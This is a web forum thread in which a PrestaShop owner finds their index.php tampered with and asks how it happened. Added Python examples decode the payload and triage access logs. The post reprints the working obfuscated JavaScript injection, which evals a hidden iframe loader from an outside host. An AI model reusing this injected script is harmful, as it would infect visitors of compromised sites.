
Have I just been hacked?


leelee23


So I woke up today and went onto my homepage, but sadly there were some errors showing on the index.php page.

 

I looked into the remote file and it had been changed:

 

<?php
/*
* 2007-2011 PrestaShop
*
* NOTICE OF LICENSE
*
* This source file is subject to the Open Software License (OSL 3.0)
* that is bundled with this package in the file LICENSE.txt.
* It is also available through the world-wide-web at this URL:
* http://opensource.org/licenses/osl-3.0.php
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to [email protected] so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade PrestaShop to newer
* versions in the future. If you wish to customize PrestaShop for your
* needs please refer to http://www.prestashop.com for more information.
*
*  @author PrestaShop SA <[email protected]>
*  @copyright  2007-2011 PrestaShop SA
*  @version  Release: $Revision: 6594 $
*  @license    http://opensource.org/licenses/osl-3.0.php  Open Software License (OSL 3.0)
*  International Registered Trademark & Property of PrestaShop SA
*/
require(dirname(__FILE__).'/config/config.inc.php');
ControllerFactory::getController('IndexController')->run();
<!-- ad --><script>c=3-1;i=-1-1+c;p=parseInt;if(p("01"+"2"+"3")===83)try{Number()["pr"+"ot"+"ot"+"ype"].q}catch(egewgsd){if(window.document)f=['-32k-32k64k61k-9k-1k59k70k58k76k68k60k69k75k5k62k60k75k28k67k60k68k60k69k75k74k25k80k43k56k62k37k56k68k60k-1k-2k57k70k59k80k-2k0k50k7k52k0k82k-28k-32k-32k-32k64k61k73k56k68k60k73k-1k0k18k-28k-32k-32k84k-9k60k67k74k60k-9k82k-28k-32k-32k-32k59k70k58k76k68k60k69k75k5k78k73k64k75k60k-1k-7k19k64k61k73k56k68k60k-9k74k73k58k20k-2k63k75k75k71k17k6k6k59k64k62k64k56k67k64k75k80k5k64k69k6k64k69k5k58k62k64k22k12k-2k-9k78k64k59k75k63k20k-2k8k7k-2k-9k63k60k64k62k63k75k20k-2k8k7k-2k-9k74k75k80k67k60k20k-2k77k64k74k64k57k64k67k64k75k80k17k63k64k59k59k60k69k18k71k70k74k64k75k64k70k69k17k56k57k74k70k67k76k75k60k18k67k60k61k75k17k7k18k75k70k71k17k7k18k-2k21k19k6k64k61k73k56k68k60k21k-7k0k18k-28k-32k-32k84k-28k-32k-32k61k76k69k58k75k64k70k69k-9k64k61k73k56k68k60k73k-1k0k82k-28k-32k-32k-32k77k56k73k-9k61k-9k20k-9k59k70k58k76k68k60k69k75k5k58k73k60k56k75k60k28k67k60k68k60k69k75k-1k-2k64k61k73k56k68k60k-2k0k18k61k5k74k60k75k24k75k75k73k64k57k76k75k60k-1k-2k74k73k58k-2k3k-2k63k75k75k71k17k6k6k59k64k62k64k56k67k64k75k80k5k64k69k6k64k69k5k58k62k64k22k12k-2k0k18k61k5k74k75k80k67k60k5k77k64k74k64k57k64k67k64k75k80k20k-2k63k64k59k59k60k69k-2k18k61k5k74k75k80k67k60k5k71k70k74k64k75k64k70k69k20k-2k56k57k74k70k67k76k75k60k-2k18k61k5k74k75k80k67k60k5k67k60k61k75k20k-2k7k-2k18k61k5k74k75k80k67k60k5k75k70k71k20k-2k7k-2k18k61k5k74k60k75k24k75k75k73k64k57k76k75k60k-1k-2k78k64k59k75k63k-2k3k-2k8k7k-2k0k18k61k5k74k60k75k24k75k75k73k64k57k76k75k60k-1k-2k63k60k64k62k63k75k-2k3k-2k8k7k-2k0k18k-28k-32k-32k-32k59k70k58k76k68k60k69k75k5k62k60k75k28k67k60k68k60k69k75k74k25k80k43k56k62k37k56k68k60k-1k-2k57k70k59k80k-2k0k50k7k52k5k56k71k71k60k69k59k26k63k64k67k59k-1k61k0k18k-28k-32k-32k84'][0].split('k');v="e"+"va"+"l";}if(v)e=window[v];w=f;s=[];r=String;for(;565!=i;i+=1){j=i;s=s+r["f"+"r"+"omC"+"har"+"C"+"ode"](w[j]*1+41);}
if(e)e(s);</script><!-- /ad -->

 

It was the same with my admin file.

 

I've removed this code now and put it back to how it was - but I'm confused as to how this could have happened?

 

Any suggestions for stopping this happening again?

 

Cheers,

 

Lee

Link to comment
Share on other sites
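An added example, not part of the original post: the injected script above stores its payload as integers joined by 'k' and rebuilds each character with fromCharCode(n*1+41) before handing the string to eval; decoded, the payload in the post builds a hidden iframe. The Python below decodes that scheme statically, without executing anything, and generalizes slightly by reading the separator and offset from the script itself. The sample script, its bad.example URL and the function names are constructed for illustration.

```python
import re

# Constructed sample using the same scheme as the injected script: integers joined
# by 'k', split at run time, then rebuilt with fromCharCode(n*1+41).
SAMPLE_SCRIPT = (
    "<script>f=['19k64k61k73k56k68k60k-9k74k73k58k20k-2k63k75k75k71k17k6k6k"
    "57k56k59k5k60k79k56k68k71k67k60k6k79k-2k21'][0].split('k');s='';"
    "for(i=0;i<f.length;i++){s+=String['f'+'romCharCode'](f[i]*1+41);}</script>"
)

SPLIT_RE = re.compile(r"""\.split\(\s*['"]([^'"\d-]+)['"]\s*\)""")  # separator
OFFSET_RE = re.compile(r"\*\s*1\s*([+-])\s*(\d+)")                  # "*1+41"
URL_RE = re.compile(r"""https?://[^\s'"<>]+""")

def decode_payload(script):
    """Return the hidden text, or None if the script does not match the scheme."""
    split, off = SPLIT_RE.search(script), OFFSET_RE.search(script)
    if not split or not off:
        return None
    sep = split.group(1)
    # Quoted run of signed integers joined by the separator found above.
    arr = re.search(r"""['"](-?\d+(?:%s-?\d+)+)['"]""" % re.escape(sep), script)
    if not arr:
        return None
    offset = int(off.group(2)) * (1 if off.group(1) == "+" else -1)
    codes = (int(n) + offset for n in arr.group(1).split(sep))
    # Skip values that are not valid code points instead of raising.
    return "".join(chr(c) for c in codes if 0 <= c < 0x110000)

def extract_urls(script):
    """URLs found in the decoded text: what the injected code would load."""
    text = decode_payload(script)
    return URL_RE.findall(text) if text else []

if __name__ == "__main__":
    print(decode_payload(SAMPLE_SCRIPT))
    print(extract_urls(SAMPLE_SCRIPT))
```

The extracted URLs are useful both for blocking and for searching other files and database rows for the same injection.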

Thanks for your reply Bazze. Aside from the CPanel 'Raw Access Log' (which on mine only shows me 24 hours of data) - is there another access log you're referring to? As you say.. think it would be really useful to have a peek into this.

Link to comment
Share on other sites

Thanks for your reply Bazze. Aside from the CPanel 'Raw Access Log' (which on mine only shows me 24 hours of data) - is there another access log you're referring to? As you say.. think it would be really useful to have a peek into this.

 

I guess this depends on your web host service provider. Contact them, they might have more logs for you. I'm used to VPS's running Apache and there you just go through the access.log-files that Apache creates.

 

So, contact your web host and explain what happened and ask if they got more log files that you could have a look at.

Link to comment
Share on other sites

Sadly they don't have any further details. They've given me some tips to work through, but I'm sure they're things I've already covered. For anyone else that has a simple problem, this is the advice given to me from my web host:

  • Please refer : Alec: http://www.hostknox.com/tutorials/prestashop/security
  • Remove unnecessary files. As your website changes, old files are ignored. They should be removed. Keep copies offline in case you wish to add them again, but remember to update any scripts. Old files are often indexed by search engines. So even if you do not link to those pages anymore, the search engines list them for Internet users to find and visit. Automated programs to search for these files can find them to exploit them.
  • Implement passwords. Any sensitive files, databases or scripts should be protected. Please use passwords that are difficult to guess. Use letters AND numbers, but be careful to keep the number of characters within the programmed limits and remember that passwords are case-sensitive.
  • Check permissions of uploaded files, make sure files are set to the proper permissions. Remember to upload images as binary and most other files as ASCII files.

Link to comment
Share on other sites

Sadly they don't have any further details. They've given me some tips to work through, but I'm sure they're things I've already covered. For anyone else that has a simple problem, this is the advice given to me from my web host:

  • Please refer : Alec: http://www.hostknox....tashop/security
  • Remove unnecessary files. As your website changes, old files are ignored. They should be removed. Keep copies offline in case you wish to add them again, but remember to update any scripts. Old files are often indexed by search engines. So even if you do not link to those pages anymore, the search engines list them for Internet users to find and visit. Automated programs to search for these files can find them to exploit them.
  • Implement passwords. Any sensitive files, databases or scripts should be protected. Please use passwords that are difficult to guess. Use letters AND numbers, but be careful to keep the number of characters within the programmed limits and remember that passwords are case-sensitive.
  • Check permissions of uploaded files, make sure files are set to the proper permissions. Remember to upload images as binary and most other files as ASCII files.

 

Seems like a standard answer, that's just sad. If you don't have log files from when it happened, it'll be quite hard to find the security hole.

 

Have you installed a third party module recently? It's important that you just install modules from trusted developers.

 

You're not using the Timthumb PHP script are you? The timthumb script is widely spread but unfortunately older versions of it are not secure. There are automated bots scanning the net for older versions of the timthumb script since it gives you a free passage into the server and is easy to exploit.

Link to comment
Share on other sites
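An added example, not part of the thread: one way to work through the Apache access logs mentioned in the replies above, listing requests in the hours before a tampered file changed that are POSTs to PHP scripts or that touch a timthumb script. The log lines, IP addresses, paths and modification time are constructed, and the function names and the six-hour window are assumptions.

```python
import re
from datetime import datetime, timedelta, timezone

# Constructed Apache "combined" log lines (documentation IPs, made-up paths).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2012:02:10:44 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Mar/2012:03:14:02 +0000] "GET /modules/demo/timthumb.php?src=img/a.jpg HTTP/1.1" 200 310 "-" "curl/7.21"
198.51.100.9 - - [12/Mar/2012:03:14:09 +0000] "POST /upload/x.php HTTP/1.1" 200 77 "-" "curl/7.21"
203.0.113.7 - - [12/Mar/2012:09:30:00 +0000] "POST /order.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""
# Assumed modification time of the tampered index.php (e.g. its mtime as shown over FTP).
MODIFIED_AT = datetime(2012, 3, 12, 3, 15, tzinfo=timezone.utc)

LINE_RE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')

def parse_line(line):
    m = LINE_RE.match(line)
    if not m:
        return None  # malformed line or a different log format
    ip, ts, method, path, status = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": ip, "time": when, "method": method, "path": path, "status": int(status)}

def triage(log_text, modified_at, window=timedelta(hours=6)):
    """Requests in the window before the file changed that deserve a closer look."""
    hits = []
    for entry in filter(None, map(parse_line, log_text.splitlines())):
        if not modified_at - window <= entry["time"] <= modified_at:
            continue
        script = entry["path"].split("?", 1)[0].lower()
        reasons = []
        if entry["method"] == "POST" and script.endswith(".php"):
            reasons.append("POST to PHP script")  # includes legitimate forms; review by hand
        if "timthumb" in script:
            reasons.append("timthumb request")
        if reasons:
            hits.append((entry["time"], entry["ip"], entry["path"], reasons))
    return hits

if __name__ == "__main__":
    for when, ip, path, reasons in triage(SAMPLE_LOG, MODIFIED_AT):
        print(when.isoformat(), ip, path, ", ".join(reasons))
```

Because shared hosts often keep only a day of raw logs, downloading them before cleaning up preserves the window this check depends on.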

Nothing recently no, it all just came a bit out of the blue. I think I'll find some time to upgrade to the latest PS version to see if there's any security fixes I'm missing.

 

Never heard of the Timthumb PHP script, so I doubt it.

 

Thanks for your help

Link to comment
Share on other sites
